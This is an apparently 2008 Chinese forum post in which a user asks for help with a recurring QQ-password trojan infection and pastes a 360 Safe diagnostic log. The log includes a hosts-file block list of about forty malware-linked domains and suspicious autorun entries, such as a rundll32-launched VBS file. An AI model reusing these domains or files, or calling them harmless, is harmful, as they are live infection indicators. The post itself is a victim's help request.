昨天同事跟我说他QQ有人登陆过,所以就仔细查了下,在E:盘下删了一个AUTORUN的文件,证实是Trojan.QQPASS.XX木马,这一删不好紧,接下来(我的世界开始下雪),我的BSY开始报警,弹出感染PAHZIJ.DLL发现Trojan.OLG.uln.接着是一大堆的木马.搞了好几次,安全模式下也杀过了,镜像也恢复过,进入系统过不了2分钟,又出现的,怀疑是别的盘也感染了.但又查不到,不知所措,希望版主及高手给点意见.(暂时解决了,但不敢重启).

补充:关闭指定杀软(还好我的是BXY,可能作者没见过)

映象劫持360安全卫士及大部杀软.其它应用程序(紫色区)

加载奇怪的服务


本来有一IP链接可疑,记在一记事本,一时大意,命名为360.杀完毒后竟找不到此文本了


附360日志:


该诊断报告由360安全卫士提供 http://www.360safe.com
诊断时间: 2008-03-25  11:49:51
诊断平台: Microsoft Windows 2000  Service Pack 4
IE版本: Internet Explorer V6.0.2800.1106 Build:62800.1106
计算机物理内存:495.48MB - 当前可用内存:164.61MB
100 - 未知 - Process: BarServer.exe [BarServer应用程序] - C:\Program Files\CWH\BarServer.exe - 35ef750b4f347855bab4690832c14c86
100 - 未知 - Process: Pphidpad.exe [] - D:\WINPENJR\Win32\pphidpad.exe - 62336165306432653936643531316264
100 - 未知 - Process: BarServerManager.exe [BarServerManager Microsoft 基础类应用程序] - C:\Program Files\CWH\BarServer.exe - fce24967ba81b1a24b89734d0d277bc9
100 - 未知 - Process: rundll32.exe [Windows Shell Common Dll] - C:\WINNT\system32\rundll32.exe C:\WINNT\system32\shell32.dll,OpenAs_RunDLL C:\WINNT\help\bai.VBS -
100 - 未知 - Process: PubwinConsole.exe [] - D:\Program Files\Hintsoft\PubwinConsole\PubwinConsole.exe - 66306466623138383139386137343634
100 - 未知 - Process: 360compkill.exe [] - C:\Documents and Settings\Administrator.QW\桌面\360compkill.exe -
100 - 未知 - Process: KillerSet.exe [] - C:\DOCUME~1\ADMINI~1.QW\LOCALS~1\Temp\RarSFX0\KillerSet.exe - 61366532366636643333663635613132
100 - 未知 - Process: Wsyscheck.exe [Wsyscheck] - E:\网络学院\软件\进程查看器\进程查看器\Wsyscheck.exe - f4e495056f7310daca6c8aa031e88910
100 - 未知 - Process: cmdCheckTools.exe [] - C:\DOCUME~1\ADMINI~1.QW\LOCALS~1\Temp\RarSFX0\check\cmdCheckTools.exe - 31343765396335396635303734336664
O1 - 未知 - Host: 127.0.0.1 yu.8s7.net
O1 - 未知 - Host: 127.0.0.1 1.jopanqc.com
O1 - 未知 - Host: 127.0.0.1 2.joppnqq.com
O1 - 未知 - Host: 127.0.0.1 wg.47255.com
O1 - 未知 - Host: 127.0.0.1 1.joppnqq.com
O1 - 未知 - Host: 127.0.0.1 xxx.m111.biz
O1 - 未知 - Host: 127.0.0.1 1.jopenqc.com
O1 - 未知 - Host: 127.0.0.1 1.jopenkk.com
O1 - 未知 - Host: 127.0.0.1 xxx.vh7.biz
O1 - 未知 - Host: 127.0.0.1 xxx.j41m.com
O1 - 未知 - Host: 127.0.0.1 3.joppnqq.com
O1 - 未知 - Host: 127.0.0.1 d.93se.com
O1 - 未知 - Host: 127.0.0.1 www.868wg.com
O1 - 未知 - Host: 127.0.0.1 xxx.mmma.biz
O1 - 未知 - Host: 127.0.0.1 ilove.com
O1 - 未知 - Host: 127.0.0.1 tp.shpzhan.cn
O1 - 未知 - Host: 127.0.0.1 www.tomwg.com
O1 - 未知 - Host: 127.0.0.1 www.cike007.cn
O1 - 未知 - Host: 127.0.0.1 www.22aaa.com
O1 - 未知 - Host: 127.0.0.1 xx.exiao01.com
O1 - 未知 - Host: 127.0.0.1 www.exiao01.com
O1 - 未知 - Host: 127.0.0.1 www.exiao01.com
O1 - 未知 - Host: 127.0.0.1 new.749571.com
O1 - 未知 - Host: 127.0.0.1 xtx.kv8.info
O1 - 未知 - Host: 127.0.0.1 cao.kv8.info
O1 - 未知 - Host: 127.0.0.1 1.jopmmqq.com
O1 - 未知 - Host: 127.0.0.1 171817.171817.com
O1 - 未知 - Host: 127.0.0.1 d2.llsging.com
O1 - 未知 - Host: 127.0.0.1 down.malasc.cn
O1 - 未知 - Host: 127.0.0.1 llboss.com
O1 - 未知 - Host: 127.0.0.1 nx.51ylb.cn
O1 - 未知 - Host: 127.0.0.1 my.531jx.cn
O1 - 未知 - Host: 127.0.0.1 qqq.dzydhx.com
O1 - 未知 - Host: 127.0.0.1 qqq.hao1658.com
O1 - 未知 - Host: 127.0.0.1 www.333292.com
O1 - 未知 - Host: 127.0.0.1 down.18dd.net
O1 - 未知 - Host: 127.0.0.1 up.22x44.com
O1 - 未知 - Host: 127.0.0.1 gxgxy.net
O2 - 未知 - BHO: (浏览器辅助对象(BHO)) - [] - {D29DCEE0-457B-45A2-A92D-741B95B7723B} - C:\Program Files\Internet Explorer\PLUGINS\NewSys55.Sys
O4 - 未知 - HKLM\..\Run: [BarServer] [BarServer应用程序] C:\Program Files\CWH\BarServer.exe
O4 - 未知 - HKLM\..\Run: [uslvitok] [] C:\WINNT\svtkqrgc.exe
O4 - 未知 - HKLM\..\Run: [SHAProc] [] C:\WINNT\SHAProc.exe
O22 - 未知 - Filename Extention: .reg - regedit.exe %1
O23 - 未知 - Service: TrkSvr [保存文件在域中卷之间移动的信息。] - C:\WINNT\system32\services.exe - (not running)
O23 - 未知 - Service: helpsvc [Help and Support] -  - (not running)
=======================================
100 - 安全 - Process: smss.exe [该进程为会话管理子系统用以初始化系统变量，ms-dos驱动名称类似lpt1以及com，调用win32壳子系统和运行在windows登陆过程。] - C:\WINNT\System32\smss.exe - ea4ce4c598b8d5d3e596a99b092b2f4a
100 - 安全 - Process: csrss.exe [客户端服务子系统，用以控制windows图形相关子系统。] - C:\WINNT\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512,512 Windows=On SubSystemType=Windows ServerDll=ba - 98d0190eb2d1b148beca121fad6ee7e3
100 - 安全 - Process: WINLOGON.EXE [windows nt用户登陆程序。] - C:\WINNT\system32\winlogon.exe - f81baa5910dcd5a14cfccca5e8b19a42
100 - 安全 - Process: SERVICES.EXE [用于管理windows服务系统进程。] - C:\WINNT\system32\services.exe - b88403257d2dae16b35315b06ef35476
100 - 安全 - Process: LSASS.EXE [本地安全权限服务控制windows安全机制。] - C:\WINNT\system32\lsass.exe - 4b8380c733f476d89541f63d00dc2734
100 - 安全 - Process: DefWatch.exe [norton anti-virus扫描你的文件和email以检查病毒。] - C:\Program Files\Symantec AntiVirus\DefWatch.exe - 52be5fa2d926ef54915c979f180a59e0
100 - 安全 - Process: LLSSRV.EXE [windows自带的许可证日志记录服务。] - C:\WINNT\System32\llssrv.exe - 6f8bdcbe2908cbd8e52f43de007b2403
100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] - C:\WINNT\system32\svchost -k rpcss - 1af0b453a17446b2c8fe88252832050b
100 - 安全 - Process: SavRoam.exe [赛门铁克公司出品的防病毒软件的相关程序。] - C:\Program Files\Symantec AntiVirus\SavRoam.exe - dfe848a5df5ce9b50f5abf154dc69805
100 - 安全 - Process: stisvc.exe [still image service用于控制扫描仪和数码相机连接在windows。] - C:\WINNT\system32\stisvc.exe - 628fbdf765bf190f23e53e2c59fd49e7
100 - 安全 - Process: Rtvscan.exe [norton anti-virus用以扫描你的文件和email中的病毒。] - C:\Program Files\Symantec AntiVirus\Rtvscan.exe - e099a2d22f6a62aeaef388e36803c96a
100 - 安全 - Process: winmgmt.exe [windows management service透过windows management instrumentation data (wmi)技术处理来自应用客户端的请求。] - C:\WINNT\System32\WBEM\WinMgmt.exe - 3562c1955c89f59da089f925d21c60d3
100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] - C:\WINNT\system32\svchost.exe -k netsvcs - 1af0b453a17446b2c8fe88252832050b
100 - 安全 - Process: msdtc.exe [microsoft distributed transaction coordinator控制多个服务器的传输，被安装在microsoft personal web server和microsoft sql server。] - C:\WINNT\system32\msdtc.exe - 9c9c2cc54c354a7616342c6143d87156
100 - 安全 - Process: mstask.exe [windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。] - C:\WINNT\system32\MSTask.exe - 575358c3d1cdf4cb44dba84fd1018d8c
100 - 安全 - Process: explorer.exe [windows program manager或者windows explorer用于控制windows图形shell，包括开始菜单、任务栏，桌面和文件管理。] - C:\WINNT\Explorer.EXE - e3df70147a75533c9308f0dd16baaef5
100 - 安全 - Process: hkcmd.exe [intel显卡驱动相关软件。] - C:\WINNT\system32\hkcmd.exe - 4156c2981fe599005368b6155acac4c0
100 - 安全 - Process: SOUNDMAN.EXE [一个软声卡控制台软件。] - C:\WINNT\SOUNDMAN.EXE - e0584ee5e7f07f04a879b19a37465588
100 - 安全 - Process: VPTray.exe [norton antivirus ce企业版杀毒软件的系统托盘。] - C:\PROGRA~1\SYMANT~1\VPTray.exe - 9f497e184cb10c3f648e434abf271dba
100 - 安全 - Process: internat.exe [输入控制图标用于更改类似国家设置、键盘类型和日期格式。] - C:\WINNT\system32\internat.exe - 2061f6ff47f6938d95c18e3a1a8cf7e2
100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] - C:\WINNT\System32\svchost.exe -k tapisrv - 1af0b453a17446b2c8fe88252832050b
100 - 安全 - Process: CMD.EXE [windows控制台程序。不像旧的command.com，cmd.exe是一个32位的命令行使用在winnt/2000/xp。] - C:\WINNT\system32\cmd.exe - 29c65068bc8a39e8c09c2331489f72f2
100 - 安全 - Process: CMD.EXE [windows控制台程序。不像旧的command.com，cmd.exe是一个32位的命令行使用在winnt/2000/xp。] - C:\WINNT\system32\CMD.EXE - 29c65068bc8a39e8c09c2331489f72f2
100 - 安全 - Process: conime.exe [console ime ime输入法控制台软件。] - C:\WINNT\system32\conime.exe - 02ae95f8b6e38bdfb99c7aa097f1d961
100 - 安全 - Process: IEXPLORE.EXE [microsoft internet explorer浏览器用于浏览网页。] - C:\Program Files\Internet Explorer\iexplore.exe - 745bd428a55c8c2fdacf167cbc16a34f
100 - 安全 - Process: NOTEPAD.EXE [notepad字符编辑器用于打开文档。在windows中附带。] - C:\WINNT\notepad.exe - d1e0cd535de36c0854bbef2edc973d29
R1 - 安全 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINNT\system32\blank.htm
R1 - 安全 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINNT\system32\blank.htm
O3 - 安全 - Toolbar: (@msdxmLC.dll,-1@2052,电台(&R)) - [是Windows Media Player播放器ActiveX控制相关文件。] - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O3 - 安全 - Toolbar: (卡卡上网安全助手) - [卡卡安全助手工具条软件相关程序。] - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINNT\system32\kakatool.dll
O4 - 安全 - HKLM\..\Run: [IgfxTray] [是Intel显卡配置和诊断程序，会同Intel 810芯片组的集成显卡安装。] C:\WINNT\system32\igfxtray.exe
O4 - 安全 - HKLM\..\Run: [HotKeysCmds] [是Intel显示卡相关程序，用于配置和诊断相关设备。] C:\WINNT\system32\hkcmd.exe
O4 - 安全 - HKLM\..\Run: [SoundMan] [Realtek声卡相关程序。] SOUNDMAN.EXE
O4 - 安全 - HKLM\..\Run: [vptray] [诺顿在任务栏显示病毒防护盾牌图标的程序] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - 安全 - HKLM\..\Run: [PPHIDPAD] [小蒙恬手写板驱动。] D:\WINPENJR\Win32\pphidpad.exe
O4 - 安全 - HKLM\..\Run: [360Safetray] [360safe实时保护功能模块。] E:\360safe\safemon\360tray.exe /start
O4 - 安全 - HKCU\..\Run: [Internat.exe] [输入法在任务栏里的图标] internat.exe
O4 - 安全 - HKCU\..\Run: [ctfmon.exe] [office xp输入法图标。] C:\WINNT\system32\ctfmon.exe
O9 - 安全 - Extra button: 电台(HKLM) - C:\WINNT\web\related.htm
O16 - 安全 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Flash播放器) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O23 - 安全 - Service: DefWatch [诺顿防毒软件相关程序。] - "C:\Program Files\Symantec AntiVirus\DefWatch.exe" - (running)
O23 - 安全 - Service: Fax [微软Microsoft传真服务相关程序，该服务允许用户创建和发送传真到微软Office组件中。] - C:\WINNT\system32\faxsvc.exe - (not running)
O23 - 安全 - Service: NtFrs [在多个服务器间维护文件目录内容的文件同步。] - C:\WINNT\system32\ntfrs.exe - (not running)
O23 - 安全 - Service: SavRoam [诺顿防毒软件相关程序] - "C:\Program Files\Symantec AntiVirus\SavRoam.exe" - (running)
O23 - 安全 - Service: Symantec AntiVirus [诺顿防毒软件相关程序。] - "C:\Program Files\Symantec AntiVirus\Rtvscan.exe" - (running)
=======================================
O31 - 未知 - Folder Menu: {7f9609be-af9a-11d1-83e0-00c04fb6e984} - C:\WINNT\system32\faxshell.dll - Microsoft Corporation - Fax Tiff Data Column Provider - 5.0.2134.1 - 8464 - 9dc8a8c3d8cbb925796aca18fd7cd7a5
O31 - 未知 - Folder Menu: {884EA37B-37C0-11d2-BE3F-00A0C9A83DA1} - C:\WINNT\system32\docprop2.dll - Microsoft Corporation - DocProp2 - 5.0.2178.1 - 304912 - a4769f665cdd13f51b1e20013bb8a21f
O31 - 未知 - Notify: crypt32chain - C:\WINNT\system32\crypt32.dll - Microsoft Corporation - Crypto API32 - 5.131.2195.6926 - 563984 - 49f8e15fc5d52bd6220f1eff38129452
O31 - 未知 - Notify: cryptnet - C:\WINNT\system32\cryptnet.dll - Microsoft Corporation - Crypto Network Related API - 5.131.2195.6926 - 63760 - 64300730e80ea464cd5e7302ede040ed
O31 - 未知 - Notify: cscdll - C:\WINNT\system32\cscdll.dll - Microsoft Corporation - Offline Network Agent - 5.0.2195.6713 - 101136 - eda6cb35feb04f73d442532309d3f2e8
O31 - 未知 - Notify: igfxcui - C:\WINNT\system32\igfxsrvc.dll - Intel Corporation - igfxsrvc Module - 3.0.0.3847 - 344064 - 6561cac76ce0b95bc822cc2668791ea4
O31 - 未知 - Notify: sclgntfy - C:\WINNT\system32\sclgntfy.dll - Microsoft Corporation - Secondary Logon Service Notification DLL - 5.0.2195.6608 - 20752 - 4942545703889ec39e671d84bf4f5a3e
O31 - 未知 - Notify: SensLogn - C:\WINNT\system32\WlNotify.dll - Microsoft Corporation - Common DLL to receive Winlogon notifications - 5.0.2195.7000 - 57104 - 435dd37315846d976445a084e5cbaffd
O31 - 未知 - Notify: termsrv - C:\WINNT\system32\wlnotify.dll - Microsoft Corporation - Common DLL to receive Winlogon notifications - 5.0.2195.7000 - 57104 - 435dd37315846d976445a084e5cbaffd
O31 - 未知 - Notify: wzcnotif - C:\WINNT\system32\wzcdlg.dll - Microsoft Corporation - Wireless Zero Configuration Service UI - 5.0.2195.6604 - 52496 - 752c43e74027c22db1d1ef45431c1552
O31 - 未知 - SODL: {7007ACCF-3202-11D1-AAD2-00805FC1270E} - C:\WINNT\system32\NETSHELL.dll - Microsoft Corporation - Network Connections Shell - 5.0.2195.6604 - 477456 - 0702530277f8fc00ab11353feb5ebc48
O31 - 未知 - SODL: {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SODL: {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINNT\system32\stobject.dll - Microsoft Corporation - Systray shell service object - 5.0.2195.6601 - 81168 - edbf9015ca69b907d213ff92bc16ca2a
O31 - 未知 - SEApproved: {00022613-0000-0000-C000-000000000046} - C:\WINNT\system32\mmsys.cpl - Microsoft Corporation - Control Panel Drivers Applet - 5.0.2161.1 - 303888 - 39307bf7e4c57c60ffb26ba1191cf848
O31 - 未知 - SEApproved: {176d6597-26d3-11d1-b350-080036a75b03} - C:\WINNT\system32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: {1F2E5C40-9550-11CE-99D2-00AA006E086C} - C:\WINNT\system32\rshx32.dll - Microsoft Corporation - Security Shell Extension - 5.0.2195.6613 - 35088 - a56d47240d182286b5282f76f38ac1a4
O31 - 未知 - SEApproved: {3EA48300-8CF6-101B-84FB-666CCB9BCD32} - C:\WINNT\system32\docprop.dll - Microsoft Corporation - OLE DocFile Property Page - 5.0.2134.1 - 43280 - 99c9cfe46938664698db93dacd2e4559
O31 - 未知 - SEApproved: {40dd6e20-7c17-11ce-a804-00aa003ca9f6} - C:\WINNT\system32\ntshrui.dll - Microsoft Corporation - Shell extensions for sharing - 5.0.2134.1 - 47888 - 89ed3a9e1f760bd30db6da2f93d9e71a
O31 - 未知 - SEApproved: {41E300E0-78B6-11ce-849B-444553540000} - C:\WINNT\system32\plustab.dll - Microsoft Corporation - Effects Control Panel extension - 5.0.2134.1 - 20752 - 780d3db3b4832ed07cb4c310294e4fc1
O31 - 未知 - SEApproved: {42071712-76d4-11d1-8b24-00a0c9068ff3} - C:\WINNT\system32\deskadp.dll - Microsoft Corporation - Advanced display adapter properties - 5.0.2920.0 - 13072 - e51adc560410d3c270e78e41656224a7
O31 - 未知 - SEApproved: {42071713-76d4-11d1-8b24-00a0c9068ff3} - C:\WINNT\system32\deskmon.dll - Microsoft Corporation - Advanced display monitor properties - 5.0.2920.0 - 14096 - 3b84b3fd7965488a3d83ced2d14c3c14
O31 - 未知 - SEApproved: {42071714-76d4-11d1-8b24-00a0c9068ff3} - deskpan.dll -  -  -  - 0 -
O31 - 未知 - SEApproved: {4E40F770-369C-11d0-8922-00A024AB2DBB} - C:\WINNT\system32\dssec.dll - Microsoft Corporation - Directory Service Security UI - 5.0.2195.6623 - 28944 - 7c65f77a04b2e3ac5df47ff86e0edfcb
O31 - 未知 - SEApproved: {56117100-C0CD-101B-81E2-00AA004AE837} - C:\WINNT\system32\shscrap.dll - Microsoft Corporation - Shell scrap object handler - 5.0.2134.1 - 23312 - fac37c24ed8cf4e4d6a7de11d5b6fbbb
O31 - 未知 - SEApproved: {59099400-57FF-11CE-BD94-0020AF85B590} - C:\WINNT\system32\diskcopy.dll - Microsoft Corporation - Windows DiskCopy - 5.0.2195.6601 - 16144 - df03f95f5216e6d612f7925c83c2c263
O31 - 未知 - SEApproved: {59be4990-f85c-11ce-aff7-00aa003ca9f6} - C:\WINNT\system32\ntlanui2.dll - Microsoft Corporation - Network object shell UI - 5.0.2134.1 - 15632 - d6da1271af84a6ea40042c802dbd9da3
O31 - 未知 - SEApproved: {5DB2625A-54DF-11D0-B6C4-0800091AA605} - C:\WINNT\System32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: {675F097E-4C4D-11D0-B6C1-0800091AA605} - C:\WINNT\system32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: 无效的CLSID：Shell extensions for file compression -  -  -  -  - 0 -
O31 - 未知 - SEApproved: {77597368-7b15-11d0-a0c2-080036af3f03} - C:\WINNT\system32\printui.dll - Microsoft Corporation - Print UI DLL - 5.0.2195.6702 - 381712 - c64f2a957ce05de2f167ab42cdfcf821
O31 - 未知 - SEApproved: {7988B573-EC89-11cf-9C00-00AA00A14F56} - C:\WINNT\system32\dskquoui.dll - Microsoft Corporation - Windows Shell Disk Quota UI DLL - 5.0.2195.6601 - 146192 - c5388ad80f85070ed6915b77939c1b62
O31 - 未知 - SEApproved: 无效的CLSID：加密上下文菜单 -  -  -  -  - 0 -
O31 - 未知 - SEApproved: {85BBD920-42A0-1069-A2E4-08002B30309D} - C:\WINNT\system32\syncui.dll - Microsoft Corporation - Windows Briefcase - 5.0.2134.1 - 166672 - a959dac0c3a546f3d690b422d4ce11c1
O31 - 未知 - SEApproved: {88895560-9AA2-1069-930E-00AA0030EBC8} - C:\WINNT\system32\hticons.dll - Hilgraeve, Inc. - HyperTerminal Applet Library - 5.0.2195.6684 - 21776 - cb2797bb4df9e1fd0a1bf4730fa269d4
O31 - 未知 - SEApproved: {BD84B380-8CA2-1069-AB1D-08000948F534} - C:\WINNT\system32\fontext.dll - Microsoft Corporation - Windows Font Folder - 5.0.2195.6601 - 200976 - ec981e4a596776aaf1464ff857d39ea7
O31 - 未知 - SEApproved: {DBCE2480-C732-101B-BE72-BA78E9AD5B27} - C:\WINNT\system32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: {F37C5810-4D3F-11d0-B4BF-00AA00BBB723} - C:\WINNT\system32\rshx32.dll - Microsoft Corporation - Security Shell Extension - 5.0.2195.6613 - 35088 - a56d47240d182286b5282f76f38ac1a4
O31 - 未知 - SEApproved: {f81e9010-6ea4-11ce-a7ff-00aa003ca9f6} - C:\WINNT\system32\ntshrui.dll - Microsoft Corporation - Shell extensions for sharing - 5.0.2134.1 - 47888 - 89ed3a9e1f760bd30db6da2f93d9e71a
O31 - 未知 - SEApproved: {f92e8c40-3d33-11d2-b1aa-080036a75b03} - C:\WINNT\system32\deskperf.dll - Microsoft Corporation - Advanced display performance properties - 5.0.2134.1 - 14096 - f790a222947407207181373b3add2d03
O31 - 未知 - SEApproved: {60254CA5-953B-11CF-8C96-00AA00B8708C} - C:\WINNT\system32\wshext.dll - Microsoft Corporation - Microsoft (r) Shell Extension for Windows Script Host - 5.6.0.6626 - 65585 - 4c252e9e26df05f93f1740e2d4f2bb9d
O31 - 未知 - SEApproved: {7444C717-39BF-11D1-8CD9-00C04FC29D45} - C:\WINNT\system32\cryptext.dll - Microsoft Corporation - Crypto Shell Extensions - 5.131.2181.1 - 49424 - 37c4bb48a2ebee5eb3bdc8cf92b683cb
O31 - 未知 - SEApproved: {7444C719-39BF-11D1-8CD9-00C04FC29D45} - C:\WINNT\system32\cryptext.dll - Microsoft Corporation - Crypto Shell Extensions - 5.131.2181.1 - 49424 - 37c4bb48a2ebee5eb3bdc8cf92b683cb
O31 - 未知 - SEApproved: {7007ACC7-3202-11D1-AAD2-00805FC1270E} - C:\WINNT\system32\NETSHELL.dll - Microsoft Corporation - Network Connections Shell - 5.0.2195.6604 - 477456 - 0702530277f8fc00ab11353feb5ebc48
O31 - 未知 - SEApproved: {DD2110F0-9EEF-11cf-8D8E-00AA0060F5BF} - C:\WINNT\system32\mstask.dll - Microsoft Corporation - Task Scheduler interface DLL - 4.71.2195.6972 - 218896 - 60ed7847b950e1409e666522c1f3b6e0
O31 - 未知 - SEApproved: {797F1E90-9EDD-11cf-8D8E-00AA0060F5BF} - C:\WINNT\system32\mstask.dll - Microsoft Corporation - Task Scheduler interface DLL - 4.71.2195.6972 - 218896 - 60ed7847b950e1409e666522c1f3b6e0
O31 - 未知 - SEApproved: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} - C:\WINNT\system32\mstask.dll - Microsoft Corporation - Task Scheduler interface DLL - 4.71.2195.6972 - 218896 - 60ed7847b950e1409e666522c1f3b6e0
O31 - 未知 - SEApproved: {1A9BA3A0-143A-11CF-8350-444553540000} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {20D04FE0-3AEA-1069-A2D8-08002B30309D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {86747AC0-42A0-1069-A2E6-08002B30309D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {0AFACED1-E828-11D1-9187-B532F1E9575D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {12518493-00B2-11d2-9FA5-9E3420524153} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {21B22460-3AEA-1069-A2DC-08002B30309D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {B091E540-83E3-11CF-A713-0020AFD79762} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {FBF23B41-E3F0-101B-8488-00AA003E56F8} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {C2FBB630-2971-11d1-A18C-00C04FD75D13} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {C2FBB631-2971-11d1-A18C-00C04FD75D13} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {13709620-C279-11CE-A49E-444553540000} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {62112AA1-EBE4-11cf-A5FB-0020AFE7292D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {4622AD11-FF23-11d0-8D34-00A0C90F2719} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {7BA4C740-9E81-11CF-99D3-00AA004AE837} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {D969A300-E7FF-11d0-A93B-00A0C90F2719} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {09799AFB-AD67-11d1-ABCD-00C04FC30936} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {3FC0B520-68A9-11D0-8D77-00C04FD70822} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {75048700-EF1F-11D0-9888-006097DEACF9} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {6D5313C0-8C62-11D1-B2CD-006097DF8C11} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {57651662-CE3E-11D0-8D77-00C04FC99D61} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {4657278A-411B-11d2-839A-00C04FD918D0} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {A470F8CF-A1E8-4f65-8335-227475AA5C46} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} - C:\WINNT\system32\sendmail.dll - Microsoft Corporation - Send Mail - 5.50.4807.2300 - 18704 - 3309d4df230f386c5fceac5521dbf727
O31 - 未知 - SEApproved: {9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} - C:\WINNT\system32\sendmail.dll - Microsoft Corporation - Send Mail - 5.50.4807.2300 - 18704 - 3309d4df230f386c5fceac5521dbf727
O31 - 未知 - SEApproved: {88C6C381-2E85-11D0-94DE-444553540000} - C:\WINNT\system32\occache.dll - Microsoft Corporation - Object Control Viewer - 6.0.2800.1106 - 87552 - 0cd724188742f6c93e6d3ae6bfb5dbdd
O31 - 未知 - SEApproved: {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {ABBE31D0-6DAE-11D0-BECA-00C04FD940BE} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {F5175861-2688-11d0-9C5E-00AA00A45957} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {08165EA0-E946-11CF-9C87-00AA005127ED} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {E3A8BDE6-ABCE-11d0-BC4B-00C04FD929DB} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
